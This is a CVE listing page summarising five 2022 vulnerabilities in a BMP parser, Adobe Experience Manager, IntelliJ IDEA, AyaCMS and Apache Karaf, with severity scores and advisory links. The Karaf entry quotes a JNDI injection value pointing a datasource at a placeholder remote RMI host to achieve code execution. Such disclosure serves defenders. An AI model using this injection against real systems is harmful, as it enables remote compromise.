CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 1CVE-2022-38143
https://notcve.org/view.php?id=CVE-2022-38143
A specially-crafted bmp file can write to arbitrary out of bounds memory, which can lead to arbitrary code execution. • https://security.gentoo.org/glsa/202305-33 https://talosintelligence.com/vulnerability_reports/TALOS-2022-1630 • CWE-123: Write-what-where Condition CWE-787: Out-of-bounds Write •
CVSS: 5.4EPSS: 0%CPEs: 2EXPL: 0CVE-2022-44510 – AEM Reflected XSS Arbitrary code execution
https://notcve.org/view.php?id=CVE-2022-44510
Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Adobe Experience Manager versión 6.5.14 (y anteriores) se ve afectado por una vulnerabilidad de Cross-Site Scripting (XSS) reflejado. Si un atacante con pocos privilegios puede convencer a una víctima para que visite una URL que hace referencia a una página vulnerable, se puede ejecutar contenido JavaScript malicioso dentro del contexto del navegador de la víctima. • https://helpx.adobe.com/security/products/experience-manager/apsb22-59.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 7.8EPSS: 0%CPEs: 1EXPL: 0CVE-2022-47896
https://notcve.org/view.php?id=CVE-2022-47896
In JetBrains IntelliJ IDEA before 2022.3.1 code Templates were vulnerable to SSTI attacks. • https://www.jetbrains.com/privacy-security/issues-fixed • CWE-94: Improper Control of Generation of Code ('Code Injection') CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine •
CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 1CVE-2022-46101
https://notcve.org/view.php?id=CVE-2022-46101
AyaCMS v3.1.2 was found to have a code flaw in the ust_sql.inc.php file, which allows attackers to cause command execution by inserting malicious code. Se descubrió que AyaCMS v3.1.2 tenía un fallo de código en el archivo ust_sql.inc.php, que permite a los atacantes provocar la ejecución de comandos insertando código malicioso. • https://github.com/loadream/AyaCMS/issues/6 • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 9.8EPSS: 0%CPEs: 2EXPL: 0CVE-2022-40145 – Apache Karaf: JDBC JAAS LDAP injection
https://notcve.org/view.php?id=CVE-2022-40145
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 Esta vulnerabilidad se trata de una posible inyección de código cuando un atacante tiene el control del servidor LDAP de destino utilizando la URL JDBC JNDI. • https://karaf.apache.org/security/cve-2022-40145.txt • CWE-20: Improper Input Validation CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') •